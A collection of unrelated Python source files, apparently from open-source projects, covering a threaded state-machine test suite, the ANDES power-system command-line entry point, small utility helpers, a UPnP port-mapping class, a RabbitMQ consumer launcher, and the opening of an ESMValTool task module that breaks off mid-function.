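    #   print(get_obs())  # returns the observation list produced by obs_calculate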
def core_function(self):
c = 0
while True:
if c == 0:
rospy.loginfo("dummy host alive")
c = (c + 1)%100
            time.sleep(1.0 / self.core_fps)  # core_fps is a rate (Hz), not a period
|
test_threading.py
|
try:
from builtins import object
except ImportError:
pass
import time
from threading import Thread
import logging
from transitions.extensions import MachineFactory
from .test_nesting import TestNestedTransitions as TestsNested
from .test_core import TestTransitions as TestCore
from .utils import Stuff, DummyModel, SomeContext
try:
from unittest.mock import MagicMock
except ImportError:
from mock import MagicMock
logger = logging.getLogger(__name__)
logger.addHandler(logging.NullHandler())
def heavy_processing():
time.sleep(1)
def heavy_checking():
time.sleep(0.5)
return False
class TestLockedTransitions(TestCore):
def setUp(self):
self.machine_cls = MachineFactory.get_predefined(locked=True)
self.stuff = Stuff(machine_cls=self.machine_cls)
self.stuff.heavy_processing = heavy_processing
self.stuff.machine.add_transition('forward', 'A', 'B', before='heavy_processing')
def tearDown(self):
pass
def test_thread_access(self):
thread = Thread(target=self.stuff.forward)
thread.start()
# give thread some time to start
time.sleep(0.01)
self.assertTrue(self.stuff.is_B())
def test_parallel_access(self):
thread = Thread(target=self.stuff.forward)
thread.start()
# give thread some time to start
time.sleep(0.01)
self.stuff.to_C()
# if 'forward' has not been locked, it is still running
# we have to wait to be sure it is done
time.sleep(1)
self.assertEqual(self.stuff.state, "C")
def test_parallel_deep(self):
self.stuff.machine.add_transition('deep', source='*', dest='C', after='to_D')
thread = Thread(target=self.stuff.deep)
thread.start()
time.sleep(0.01)
self.stuff.to_C()
time.sleep(1)
self.assertEqual(self.stuff.state, "C")
def test_conditional_access(self):
        self.stuff.heavy_checking = heavy_checking  # checking takes 0.5s and returns False
self.stuff.machine.add_transition('advance', 'A', 'B', conditions='heavy_checking')
self.stuff.machine.add_transition('advance', 'A', 'D')
t = Thread(target=self.stuff.advance)
t.start()
time.sleep(0.1)
logger.info('Check if state transition done...')
# Thread will release lock before Transition is finished
res = self.stuff.is_D()
self.assertTrue(res)
def test_pickle(self):
import sys
if sys.version_info < (3, 4):
import dill as pickle
else:
import pickle
# go to non initial state B
self.stuff.to_B()
# pickle Stuff model
dump = pickle.dumps(self.stuff)
self.assertIsNotNone(dump)
stuff2 = pickle.loads(dump)
self.assertTrue(stuff2.is_B())
# check if machines of stuff and stuff2 are truly separated
stuff2.to_A()
self.stuff.to_C()
self.assertTrue(stuff2.is_A())
thread = Thread(target=stuff2.forward)
thread.start()
# give thread some time to start
time.sleep(0.01)
# both objects should be in different states
# and also not share locks
begin = time.time()
# stuff should not be locked and execute fast
self.assertTrue(self.stuff.is_C())
fast = time.time()
# stuff2 should be locked and take about 1 second
# to be executed
self.assertTrue(stuff2.is_B())
blocked = time.time()
self.assertAlmostEqual(fast - begin, 0, delta=0.1)
self.assertAlmostEqual(blocked - begin, 1, delta=0.1)
def test_context_managers(self):
class CounterContext(object):
def __init__(self):
self.counter = 0
self.level = 0
self.max = 0
super(CounterContext, self).__init__()
def __enter__(self):
self.counter += 1
self.level += 1
self.max = max(self.level, self.max)
def __exit__(self, *exc):
self.level -= 1
M = MachineFactory.get_predefined(locked=True)
c = CounterContext()
m = M(states=['A', 'B', 'C', 'D'], transitions=[['reset', '*', 'A']], initial='A', machine_context=c)
m.get_triggers('A')
self.assertEqual(c.max, 1) # was 3 before
self.assertEqual(c.counter, 4) # was 72 (!) before
# This test has been used to quantify the changes made in locking in version 0.5.0.
# See https://github.com/tyarkoni/transitions/issues/167 for the results.
# def test_performance(self):
# import timeit
# states = ['A', 'B', 'C']
# transitions = [['go', 'A', 'B'], ['go', 'B', 'C'], ['go', 'C', 'A']]
#
# M1 = MachineFactory.get_predefined()
# M2 = MachineFactory.get_predefined(locked=True)
#
# def test_m1():
# m1 = M1(states=states, transitions=transitions, initial='A')
# m1.get_triggers('A')
#
# def test_m2():
# m2 = M2(states=states, transitions=transitions, initial='A')
# m2.get_triggers('A')
#
# t1 = timeit.timeit(test_m1, number=20000)
# t2 = timeit.timeit(test_m2, number=20000)
# self.assertAlmostEqual(t2/t1, 1, delta=0.5)
class TestMultipleContexts(TestCore):
def setUp(self):
self.event_list = []
self.s1 = DummyModel()
self.c1 = SomeContext(event_list=self.event_list)
self.c2 = SomeContext(event_list=self.event_list)
self.c3 = SomeContext(event_list=self.event_list)
self.c4 = SomeContext(event_list=self.event_list)
self.machine_cls = MachineFactory.get_predefined(locked=True)
self.stuff = Stuff(machine_cls=self.machine_cls, extra_kwargs={
'machine_context': [self.c1, self.c2]
})
self.stuff.machine.add_model(self.s1, model_context=[self.c3, self.c4])
del self.event_list[:]
self.stuff.machine.add_transition('forward', 'A', 'B')
def tearDown(self):
self.stuff.machine.remove_model(self.s1)
def test_ordering(self):
self.stuff.forward()
# There are a lot of internal enter/exits, but the key is that the outermost are in the expected order
self.assertEqual((self.c1, "enter"), self.event_list[0])
self.assertEqual((self.c2, "enter"), self.event_list[1])
self.assertEqual((self.c2, "exit"), self.event_list[-2])
self.assertEqual((self.c1, "exit"), self.event_list[-1])
def test_model_context(self):
self.s1.forward()
self.assertEqual((self.c1, "enter"), self.event_list[0])
self.assertEqual((self.c2, "enter"), self.event_list[1])
# Since there are a lot of internal enter/exits, we don't actually know how deep in the stack
# to look for these. Should be able to correct when https://github.com/tyarkoni/transitions/issues/167
self.assertIn((self.c3, "enter"), self.event_list)
self.assertIn((self.c4, "enter"), self.event_list)
self.assertIn((self.c4, "exit"), self.event_list)
self.assertIn((self.c3, "exit"), self.event_list)
self.assertEqual((self.c2, "exit"), self.event_list[-2])
self.assertEqual((self.c1, "exit"), self.event_list[-1])
# Same as TestLockedTransition but with LockedHierarchicalMachine
class TestLockedHierarchicalTransitions(TestsNested, TestLockedTransitions):
def setUp(self):
states = ['A', 'B', {'name': 'C', 'children': ['1', '2', {'name': '3', 'children': ['a', 'b', 'c']}]},
'D', 'E', 'F']
self.machine_cls = MachineFactory.get_predefined(locked=True, nested=True)
self.state_cls = self.machine_cls.state_cls
self.state_cls.separator = '_'
self.stuff = Stuff(states, machine_cls=self.machine_cls)
self.stuff.heavy_processing = heavy_processing
self.stuff.machine.add_transition('forward', '*', 'B', before='heavy_processing')
def test_parallel_access(self):
thread = Thread(target=self.stuff.forward)
thread.start()
# give thread some time to start
time.sleep(0.01)
self.stuff.to_C()
# if 'forward' has not been locked, it is still running
# we have to wait to be sure it is done
time.sleep(1)
self.assertEqual(self.stuff.state, "C")
def test_callbacks(self):
class MachineModel(self.stuff.machine_cls):
def __init__(self):
self.mock = MagicMock()
super(MachineModel, self).__init__(self, states=['A', 'B', 'C'])
def on_enter_A(self):
self.mock()
model = MachineModel()
model.to_A()
self.assertTrue(model.mock.called)
def test_pickle(self):
import sys
if sys.version_info < (3, 4):
import dill as pickle
else:
import pickle
states = ['A', 'B', {'name': 'C', 'children': ['1', '2', {'name': '3', 'children': ['a', 'b', 'c']}]},
'D', 'E', 'F']
transitions = [
{'trigger': 'walk', 'source': 'A', 'dest': 'B'},
{'trigger': 'run', 'source': 'B', 'dest': 'C'},
{'trigger': 'sprint', 'source': 'C', 'dest': 'D'}
]
m = self.stuff.machine_cls(states=states, transitions=transitions, initial='A')
m.heavy_processing = heavy_processing
m.add_transition('forward', 'A', 'B', before='heavy_processing')
# # go to non initial state B
m.to_B()
# pickle Stuff model
dump = pickle.dumps(m)
self.assertIsNotNone(dump)
m2 = pickle.loads(dump)
self.assertTrue(m2.is_B())
m2.to_C_3_a()
m2.to_C_3_b()
# check if machines of stuff and stuff2 are truly separated
m2.to_A()
m.to_C()
self.assertTrue(m2.is_A())
thread = Thread(target=m2.forward)
thread.start()
# give thread some time to start
time.sleep(0.01)
# both objects should be in different states
# and also not share locks
begin = time.time()
# stuff should not be locked and execute fast
self.assertTrue(m.is_C())
fast = time.time()
# stuff2 should be locked and take about 1 second
# to be executed
self.assertTrue(m2.is_B())
blocked = time.time()
self.assertAlmostEqual(fast - begin, 0, delta=0.1)
self.assertAlmostEqual(blocked - begin, 1, delta=0.1)
|
main.py
|
#!/usr/bin/env python3
# [ANDES] (C)2015-2020 Hantao Cui
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# File name: main.py
# Last modified: 8/16/20, 7:26 PM
import glob
import logging
import os
import io
import sys
import platform
import pprint
import cProfile
import pstats
from time import sleep
from subprocess import call
from typing import Optional, Union
from functools import partial
import andes
from andes.system import System
from andes.routines import routine_cli
from andes.utils.misc import elapsed, is_interactive
from andes.utils.paths import get_config_path, tests_root, get_log_dir
from andes.shared import coloredlogs, unittest
from andes.shared import Pool, Process
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
def config_logger(stream=True,
file=True,
stream_level=logging.INFO,
log_file='andes.log',
log_path=None,
file_level=logging.DEBUG,
):
"""
Configure a logger for the andes package with options for a `FileHandler`
and a `StreamHandler`. This function is called at the beginning of
``andes.main.main()``.
Parameters
----------
stream : bool, optional
Create a `StreamHandler` for `stdout` if ``True``.
If ``False``, the handler will not be created.
    file : bool, optional
True if logging to ``log_file``.
log_file : str, optional
        Log file name for `FileHandler`, ``'andes.log'`` by default.
If ``None``, the `FileHandler` will not be created.
log_path : str, optional
Path to store the log file. By default, the path is generated by
get_log_dir() in utils.misc.
stream_level : {10, 20, 30, 40, 50}, optional
`StreamHandler` verbosity level.
file_level : {10, 20, 30, 40, 50}, optional
`FileHandler` verbosity level.
Returns
-------
None
"""
lg = logging.getLogger('andes')
lg.setLevel(logging.DEBUG)
if log_path is None:
log_path = get_log_dir()
sh_formatter_str = '%(message)s'
if stream_level == 1:
sh_formatter_str = '%(name)s:%(lineno)d - %(levelname)s - %(message)s'
stream_level = 10
sh_formatter = logging.Formatter(sh_formatter_str)
if len(lg.handlers) == 0:
if stream is True:
sh = logging.StreamHandler()
sh.setFormatter(sh_formatter)
sh.setLevel(stream_level)
lg.addHandler(sh)
# file handler for level DEBUG and up
if file is True and (log_file is not None):
log_full_path = os.path.join(log_path, log_file)
fh_formatter = logging.Formatter('%(process)d: %(asctime)s - %(name)s - %(levelname)s - %(message)s')
fh = logging.FileHandler(log_full_path)
fh.setLevel(file_level)
fh.setFormatter(fh_formatter)
lg.addHandler(fh)
globals()['logger'] = lg
if not is_interactive():
coloredlogs.install(logger=lg, level=stream_level, fmt=sh_formatter_str)
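# Example (a minimal sketch; only uses the options documented above):
#   config_logger(file=False, stream_level=logging.DEBUG)
#   logging.getLogger('andes').debug('debug output now visible on stdout')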
def edit_conf(edit_config: Optional[Union[str, bool]] = ''):
"""
Edit the Andes config file which occurs first in the search path.
Parameters
----------
edit_config : bool
If ``True``, try to open up an editor and edit the config file. Otherwise returns.
Returns
-------
bool
        ``True`` if a config file is found and an editor is opened. ``False`` if ``edit_config`` is False.
"""
ret = False
# no `edit-config` supplied
if edit_config == '':
return ret
conf_path = get_config_path()
if conf_path is None:
logger.info('Config file does not exist. Automatically saving.')
system = System()
conf_path = system.save_config()
logger.info('Editing config file "%s"', conf_path)
editor = ''
if edit_config is not None:
# use `edit_config` as default editor
editor = edit_config
else:
# use the following default editors
if platform.system() == 'Linux':
editor = os.environ.get('EDITOR', 'vim')
elif platform.system() == 'Darwin':
editor = os.environ.get('EDITOR', 'vim')
elif platform.system() == 'Windows':
editor = 'notepad.exe'
editor_cmd = editor.split()
editor_cmd.append(conf_path)
call(editor_cmd)
ret = True
return ret
def save_conf(config_path=None, overwrite=None):
"""
Save the Andes config to a file at the path specified by ``save_config``.
The save action will not run if ``save_config = ''``.
Parameters
----------
config_path : None or str, optional, ('' by default)
        Path to the file to save the config file. If the path is an empty
string, the save action will not run. Save to
`~/.andes/andes.conf` if ``None``.
Returns
-------
bool
        ``True`` if the save action is run. ``False`` otherwise.
"""
ret = False
# no ``--save-config ``
if config_path == '':
return ret
if config_path is not None and os.path.isdir(config_path):
config_path = os.path.join(config_path, 'andes.rc')
ps = System()
ps.save_config(config_path, overwrite=overwrite)
ret = True
return ret
def remove_output(recursive=False):
"""
Remove the outputs generated by Andes, including power flow reports
``_out.txt``, time-domain list ``_out.lst`` and data ``_out.dat``,
eigenvalue analysis report ``_eig.txt``.
Parameters
----------
recursive : bool
Recursively clean all subfolders
Returns
-------
bool
        ``True`` if the function body executes with success. ``False``
otherwise.
"""
found = False
cwd = os.getcwd()
if recursive:
dirs = [x[0] for x in os.walk(cwd)]
else:
dirs = (cwd,)
for d in dirs:
for file in os.listdir(d):
if file.endswith('_eig.txt') or \
file.endswith('_out.txt') or \
file.endswith('_out.lst') or \
file.endswith('_out.npy') or \
file.endswith('_out.npz') or \
file.endswith('_out.csv') or \
file.endswith('_prof.prof') or \
file.endswith('_prof.txt'):
found = True
try:
os.remove(os.path.join(d, file))
logger.info('"%s" removed.', os.path.join(d, file))
except IOError:
logger.error('Error removing file "%s".',
os.path.join(d, file))
if not found:
logger.info('No output file found in the working directory.')
return True
def print_license():
"""
Print out Andes license to stdout.
"""
print(f"""
ANDES version {andes.__version__}
Copyright (c) 2015-2020 Hantao Cui
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
A copy of the GNU General Public License is included below.
For further information, see <http://www.gnu.org/licenses/>.
""")
return True
def load(case, codegen=False, setup=True, **kwargs):
"""
Load a case and set up a system without running routine.
Return a system.
Takes other kwargs recognizable by ``System``,
    such as ``addfile``, ``input_path``, and ``no_output``.
Parameters
----------
case: str
Path to the test case
codegen : bool, optional
Call full `System.prepare` on the returned system.
        Set to True if one needs to inspect pretty-print
equations and run simulations.
setup : bool, optional
Call `System.setup` after loading
Warnings
    --------
    If one needs to add devices in addition to those from the case
    file, do ``setup=False`` and call ``System.add()`` to add devices.
    When done, manually invoke ``setup()`` to set up the system.
    """
system = System(case=case, **kwargs)
if codegen:
system.prepare()
else:
system.undill()
if not andes.io.parse(system):
return None
if setup:
system.setup()
return system
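# Example usage (a sketch; the case path and device parameters are illustrative):
#   ss = load('my_case.xlsx', setup=False)
#   ss.add('PQ', dict(bus=1, p0=0.1, q0=0.05))  # add extra devices before setup
#   ss.setup()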
def run_case(case, *, routine='pflow', profile=False,
convert='', convert_all='', add_book=None,
codegen=False, remove_pycapsule=False, **kwargs):
"""
Run a single simulation case.
"""
pr = cProfile.Profile()
# enable profiler if requested
if profile is True:
pr.enable()
system = load(case, codegen=codegen, **kwargs)
if system is None:
return None
skip_empty = True
overwrite = None
# convert to xlsx and process `add-book` option
if add_book is not None:
convert = 'xlsx'
overwrite = True
if convert_all != '':
convert = 'xlsx'
skip_empty = False
# convert to the requested format
if convert != '':
andes.io.dump(system, convert, overwrite=overwrite, skip_empty=skip_empty,
add_book=add_book)
return system
if routine is not None:
if isinstance(routine, str):
routine = [routine]
if 'pflow' in routine:
routine = list(routine)
routine.remove('pflow')
if system.is_setup:
system.PFlow.run(**kwargs)
for r in routine:
system.__dict__[routine_cli[r.lower()]].run(**kwargs)
else:
logger.error("System is not set up. Routines cannot continue.")
# Disable profiler and output results
if profile:
pr.disable()
if system.files.no_output:
nlines = 40
s = io.StringIO()
            ps = pstats.Stats(pr, stream=s).sort_stats('cumtime')
ps.print_stats(nlines)
logger.info(s.getvalue())
s.close()
else:
nlines = 999
with open(system.files.prof, 'w') as s:
ps = pstats.Stats(pr, stream=s).sort_stats('cumtime')
ps.print_stats(nlines)
ps.dump_stats(system.files.prof_raw)
logger.info('cProfile text data written to "%s".', system.files.prof)
logger.info('cProfile raw data written to "%s". View with tool `snakeviz`.', system.files.prof_raw)
if remove_pycapsule is True:
system.remove_pycapsule()
return system
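# Example (a sketch; file names are illustrative, routine keys follow `routine_cli`):
#   run_case('ieee14.xlsx', routine='tds')   # power flow first, then time-domain simulation
#   run_case('ieee14.raw', convert='xlsx')   # only convert the case format and return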
def _find_cases(filename, path):
"""
Find valid cases using the provided names and path
Parameters
----------
filename : str
Test case file name
Returns
-------
list
A list of valid cases.
"""
logger.info('Working directory: "%s"', os.getcwd())
if len(filename) == 0:
logger.info('info: no input file. Use `andes run -h` for help.')
if isinstance(filename, str):
filename = [filename]
cases = []
for file in filename:
full_paths = os.path.join(path, file)
found = glob.glob(full_paths)
if len(found) == 0:
logger.error('error: file "%s" does not exist.', full_paths)
else:
cases += found
# remove folders and make cases unique
unique_cases = list(set(cases))
valid_cases = []
for case in unique_cases:
if os.path.isfile(case):
valid_cases.append(case)
if len(valid_cases) > 0:
valid_cases = sorted(valid_cases)
logger.debug('Found files: %s', pprint.pformat(valid_cases))
return valid_cases
def set_logger_level(lg, type_to_set, level):
"""Set logging level for the given type of handler."""
for ii, h in enumerate(lg.handlers):
if isinstance(h, type_to_set):
h.setLevel(level)
def find_log_path(lg):
"""Find the file paths of the FileHandlers."""
out = []
for h in lg.handlers:
if isinstance(h, logging.FileHandler):
out.append(h.baseFilename)
return out
def _run_multiprocess_proc(cases, ncpu=os.cpu_count(), **kwargs):
"""
Run multiprocessing with `Process`.
Return values from `run_case` are not preserved. Always return `True` when done.
"""
# start processes
jobs = []
for idx, file in enumerate(cases):
job = Process(name=f'Process {idx:d}', target=run_case, args=(file,), kwargs=kwargs)
jobs.append(job)
job.start()
start_msg = f'Process {idx:d} for "{file:s}" started.'
print(start_msg)
logger.debug(start_msg)
if (idx % ncpu == ncpu - 1) or (idx == len(cases) - 1):
sleep(0.1)
for job in jobs:
job.join()
jobs = []
return True
def _run_multiprocess_pool(cases, ncpu=os.cpu_count(), verbose=logging.INFO, **kwargs):
"""
Run multiprocessing jobs using Pool.
This function returns all System instances in a list, but requires longer computation time.
Parameters
----------
    ncpu : int, optional = os.cpu_count()
Number of cpu cores to use in parallel
mp_verbose : 10 - 50
Verbosity level during multiprocessing
verbose : 10, 20, 30, 40, 50
Verbosity level outside multiprocessing
"""
pool = Pool(ncpu)
print("Cases are processed in the following order:")
print('\n'.join([f'"{name}"' for name in cases]))
ret = pool.map(partial(run_case, verbose=verbose, remove_pycapsule=True, **kwargs), cases)
return ret
def run(filename, input_path='', verbose=20, mp_verbose=30, ncpu=os.cpu_count(), pool=False,
cli=False, codegen=False, shell=False, **kwargs):
"""
Entry point to run ANDES routines.
Parameters
----------
filename : str
file name (or pattern)
input_path : str, optional
input search path
verbose : int, 10 (DEBUG), 20 (INFO), 30 (WARNING), 40 (ERROR), 50 (CRITICAL)
Verbosity level
mp_verbose : int
Verbosity level for multiprocessing tasks
ncpu : int, optional
Number of cpu cores to use in parallel
pool: bool, optional
Use Pool for multiprocessing to return a list of created Systems.
    cli : bool, optional
        True if running from the command line. If True, return an exit code
        instead of a System object.
    codegen : bool, optional
        Run full code generation for System before loading case.
        Only used for a single test case.
    shell : bool, optional
        If True, enter an IPython shell after the routine.
    kwargs
        Other supported keyword arguments
Returns
-------
System or exit_code
        An instance of System (if ``cli == False``) or an exit code otherwise.
"""
if is_interactive():
config_logger(file=False, stream_level=verbose)
# put `input_path` back to `kwargs`
kwargs['input_path'] = input_path
cases = _find_cases(filename, input_path)
system = None
ex_code = 0
if len(filename) > 0 and len(cases) == 0:
ex_code = 1 # file specified but not found
t0, _ = elapsed()
if len(cases) == 1:
system = run_case(cases[0], codegen=codegen, **kwargs)
elif len(cases) > 1:
# suppress logging output during multiprocessing
logger.info('-> Processing %s jobs on %s CPUs.', len(cases), ncpu)
set_logger_level(logger, logging.StreamHandler, mp_verbose)
set_logger_level(logger, logging.FileHandler, logging.DEBUG)
kwargs['no_pbar'] = True
if pool is True:
system = _run_multiprocess_pool(cases, ncpu=ncpu, verbose=verbose, mp_verbose=mp_verbose, **kwargs)
else:
system = _run_multiprocess_proc(cases, ncpu=ncpu, verbose=verbose, mp_verbose=mp_verbose, **kwargs)
# restore command line output when all jobs are done
set_logger_level(logger, logging.StreamHandler, verbose)
log_files = find_log_path(logger)
if len(log_files) > 0:
log_paths = '\n'.join(log_files)
print(f'Log saved to "{log_paths}".')
t0, s0 = elapsed(t0)
if len(cases) == 1:
if system is not None:
ex_code += system.exit_code
else:
ex_code += 1
elif len(cases) > 1:
if isinstance(system, list):
for s in system:
ex_code += s.exit_code
if len(cases) == 1:
if ex_code == 0:
print(f'-> Single process finished in {s0}.')
else:
print(f'-> Single process exit with an error in {s0}.')
elif len(cases) > 1:
if ex_code == 0:
print(f'-> Multiprocessing finished in {s0}.')
else:
print(f'-> Multiprocessing exit with an error in {s0}.')
# IPython interactive shell
if shell is True:
try:
from IPython import embed
# load plotter before entering IPython
if system is None:
logger.warning("IPython: The System object has not been created.")
elif isinstance(system, System):
logger.info("IPython: Access System object in variable `system`.")
system.TDS.load_plotter()
elif isinstance(system, list):
logger.warning("IPython: System objects stored in list `system`.\n"
"Call `TDS.load_plotter()` on each for plotter.")
embed()
except ImportError:
logger.warning("IPython import error. Installed?")
if cli is True:
return ex_code
return system
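# Example (a sketch; file patterns are illustrative):
#   system = run('kundur.xlsx', routine='tds')         # single case, returns a System
#   systems = run('cases/*.xlsx', pool=True, ncpu=4)   # multiple cases, returns a list of Systems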
def plot(**kwargs):
"""
Wrapper for the plot tool.
"""
from andes.plot import tdsplot
tdsplot(**kwargs)
def misc(edit_config='', save_config='', show_license=False, clean=True, recursive=False,
overwrite=None, **kwargs):
"""
Misc functions.
"""
if edit_conf(edit_config):
return
if show_license:
print_license()
return
if save_config != '':
save_conf(save_config, overwrite=overwrite)
return
if clean is True:
remove_output(recursive)
return
logger.info("info: no option specified. Use 'andes misc -h' for help.")
def prepare(quick=False, incremental=False, cli=False, full=False, **kwargs):
"""
Run code generation.
Warnings
--------
The default behavior has changed since v1.0.8: when `cli` is `True` and
`full` is not `True`, quick code generation will be used.
Returns
-------
System object if `cli` is `False`; exit_code 0 otherwise.
"""
# use `quick` for cli if `full` is not enforced,
# because the LaTeX code gen is usually discarded in CLI.
if cli is True:
if not full:
quick = True
if full is True:
quick = False
system = System()
system.prepare(quick=quick, incremental=incremental)
if cli is True:
return 0
else:
return system
def selftest(quick=False, **kwargs):
"""
Run unit tests.
"""
# map verbosity level from logging to unittest
vmap = {1: 3, 10: 3, 20: 2, 30: 1, 40: 1, 50: 1}
verbose = vmap[kwargs.get('verbose', 20)]
# skip if quick
quick_skips = ('test_1_docs', 'test_codegen_inc')
try:
logger.handlers[0].setLevel(logging.WARNING)
sys.stdout = open(os.devnull, 'w') # suppress print statements
except IndexError: # logger not set up
pass
# discover test cases
test_directory = tests_root()
suite = unittest.TestLoader().discover(test_directory)
# remove codegen for quick mode
if quick is True:
for test_group in suite._tests:
for test_class in test_group._tests:
tests_keep = list()
for t in test_class._tests:
if t._testMethodName not in quick_skips:
tests_keep.append(t)
test_class._tests = tests_keep
unittest.TextTestRunner(verbosity=verbose).run(suite)
sys.stdout = sys.__stdout__
def doc(attribute=None, list_supported=False, init_seq=False, config=False, **kwargs):
"""
Quick documentation from command-line.
"""
system = System()
if attribute is not None:
if attribute in system.__dict__ and hasattr(system.__dict__[attribute], 'doc'):
if init_seq is True:
system.__dict__[attribute].get_init_order()
return
logger.info(system.__dict__[attribute].doc())
else:
logger.error('Model <%s> does not exist.', attribute)
elif list_supported is True:
logger.info(system.supported_models())
else:
logger.info('info: no option specified. Use \'andes doc -h\' for help.')
|
toolkit.py
|
# The MIT License (MIT).
# Copyright (c) 2015, Nicolas Sebrecht & contributors.
import os
from threading import Thread
def runHook(hookFunc, *args):
class Hook(object):
def __init__(self):
self._stop = True
def ended(self):
self._stop = False
def stop(self):
return self._stop
hookName = hookFunc.__name__
# Don't run hooks for action unitTests.
if hookName == 'preHook':
if args[0] == 'unitTests':
return False
hook = Hook()
args = (hook,) + args
thread = Thread(name=hookName, target=hookFunc, args=args, daemon=True)
thread.start()
thread.join(10) # TODO: get timeout from rascal.
return hook.stop()
def xTrans(thing, transforms):
"""Applies set of transformations to a thing.
:args:
- thing: string; if None, then no processing will take place.
- transforms: iterable that returns transformation function
on each turn.
Returns transformed thing."""
    if thing is None:
return None
for f in transforms:
thing = f(thing)
return thing
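# Example (sketch):
#   xTrans(' Hello ', [str.strip, str.lower])  # -> 'hello'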
def expandPath(path):
xtrans = [os.path.expanduser, os.path.expandvars, os.path.abspath]
return xTrans(path, xtrans)
def dictValueFromPath(dictionnary, path):
def getItem(tmpDict, lst_path):
if len(lst_path) > 0:
if isinstance(tmpDict, dict):
newDict = tmpDict.get(lst_path.pop(0))
return getItem(newDict, lst_path)
else:
raise KeyError('invalid path')
return tmpDict
lst_path = path.split('.')
return getItem(dictionnary, lst_path)
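# Example (sketch):
#   dictValueFromPath({'general': {'timeout': 10}}, 'general.timeout')  # -> 10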
|
upnp.py
|
import logging
import threading
from queue import Queue
from typing import Optional
try:
import miniupnpc
except ImportError:
pass
log = logging.getLogger(__name__)
class UPnP:
thread: Optional[threading.Thread] = None
queue: Queue = Queue()
def __init__(self):
def run():
try:
self.upnp = miniupnpc.UPnP()
self.upnp.discoverdelay = 30
self.upnp.discover()
self.upnp.selectigd()
keep_going = True
while keep_going:
msg = self.queue.get()
if msg[0] == "remap":
port = msg[1]
log.info(f"Attempting to enable UPnP (open up port {port})")
try:
self.upnp.deleteportmapping(port, "TCP")
except Exception as e:
log.info(f"Removal of previous portmapping failed. This does not indicate an error: {e}")
self.upnp.addportmapping(port, "TCP", self.upnp.lanaddr, port, "beet", "")
log.info(
f"Port {port} opened with UPnP. lanaddr {self.upnp.lanaddr} "
f"external: {self.upnp.externalipaddress()}"
)
elif msg[0] == "release":
port = msg[1]
log.info(f"UPnP, releasing port {port}")
self.upnp.deleteportmapping(port, "TCP")
log.info(f"UPnP, Port {port} closed")
elif msg[0] == "shutdown":
keep_going = False
except Exception as e:
log.info(
"UPnP failed. This is not required to run beet, it allows incoming connections from other peers."
)
log.info(e)
self.thread = threading.Thread(target=run)
self.thread.start()
def remap(self, port):
self.queue.put(("remap", port))
def release(self, port):
self.queue.put(("release", port))
def shutdown(self):
if not self.thread:
return
self.queue.put(("shutdown",))
log.info("UPnP, shutting down thread")
self.thread.join()
self.thread = None
# this is here just in case the UPnP object is destroyed non-gracefully,
# e.g. via an exception before the main thread can call shutdown()
def __del__(self):
self.shutdown()
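# Example usage (a sketch; requires miniupnpc and a UPnP-capable gateway on the LAN):
#   upnp = UPnP()
#   upnp.remap(8444)    # ask the gateway to forward TCP port 8444 to this host
#   ...                 # serve traffic
#   upnp.release(8444)
#   upnp.shutdown()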
|
main.py
|
#!/usr/bin/python3
import os
from multiprocessing import Process
import json
from app.client import Consumer
from app.engine import Engine
def main():
cpu_count = os.cpu_count()
processes = [Process(target=start_consumers) for x in range(cpu_count)]
for proc in processes:
proc.start()
print("Created {} rabbitmq consumers".format(cpu_count))
print(' [*] Waiting for messages. To exit press CTRL+C or kill process')
#finish when all consumers die
for proc in processes:
proc.join()
print("The all rabbitmq consumers is down")
def start_consumers():
client = Consumer()
client.start_consuming(callback)
#for each consume use this callback
def callback(ch, method, properties, body):
engine = Engine()
engine.initCollaborativeFilteringModel(json.loads(body.decode()))
# def main():
# engine = Engine()
# engine.loadMovieLensDataset()
# engine.collaborativeFilteringModel()
# guard so worker processes spawned by multiprocessing do not re-run main()
if __name__ == "__main__":
    main()
|
_task.py
|
"""ESMValtool task definition."""
import abc
import contextlib
import datetime
import logging
import numbers
import os
import pprint
import subprocess
import sys
import textwrap
import threading
import time
from copy import deepcopy
from multiprocessing import Pool
from multiprocessing.pool import ApplyResult
from pathlib import Path, PosixPath
from shutil import which
from typing import Dict, Type
import psutil
import yaml
from ._citation import _write_citation_files
from ._config import DIAGNOSTICS, TAGS
from ._provenance import TrackedFile, get_task_provenance
def path_representer(dumper, data):
"""For printing pathlib.Path objects in yaml files."""
return dumper.represent_scalar('tag:yaml.org,2002:str', str(data))
yaml.representer.SafeRepresenter.add_representer(Path, path_representer)
yaml.representer.SafeRepresenter.add_representer(PosixPath, path_representer)
logger = logging.getLogger(__name__)
DATASET_KEYS = {
'mip',
}
def _get_resource_usage(process, start_time, children=True):
"""Get resource usage."""
# yield header first
entries = [
'Date and time (UTC)',
'Real time (s)',
'CPU time (s)',
'CPU (%)',
'Memory (GB)',
'Memory (%)',
'Disk read (GB)',
'Disk write (GB)',
]
fmt = '{}\t' * len(entries[:-1]) + '{}\n'
yield (fmt.format(*entries), 0.)
# Compute resource usage
gigabyte = float(2**30)
precision = [1, 1, None, 1, None, 3, 3]
cache = {}
max_memory = 0.
try:
process.io_counters()
except AttributeError:
counters_available = False
else:
counters_available = True
while process.is_running():
try:
if children:
# Include child processes
processes = process.children(recursive=True)
processes.append(process)
else:
processes = [process]
# Update resource usage
for proc in cache:
# Set cpu percent and memory usage to 0 for old processes
if proc not in processes:
cache[proc][1] = 0
cache[proc][2] = 0
cache[proc][3] = 0
for proc in processes:
# Update current processes
cache[proc] = [
proc.cpu_times().user + proc.cpu_times().system,
proc.cpu_percent(),
proc.memory_info().rss / gigabyte,
proc.memory_percent(),
(proc.io_counters().read_bytes /
gigabyte if counters_available else float('nan')),
(proc.io_counters().write_bytes /
gigabyte if counters_available else float('nan')),
]
except (OSError, psutil.AccessDenied, psutil.NoSuchProcess):
# Try again if an error occurs because some process died
continue
# Create and yield log entry
entries = [sum(entry) for entry in zip(*cache.values())]
entries.insert(0, time.time() - start_time)
entries = [round(entry, p) for entry, p in zip(entries, precision)]
entries.insert(0, datetime.datetime.utcnow())
max_memory = max(max_memory, entries[4])
yield (fmt.format(*entries), max_memory)
@contextlib.contextmanager
def resource_usage_logger(pid, filename, interval=1, children=True):
"""Log resource usage."""
halt = threading.Event()
def _log_resource_usage():
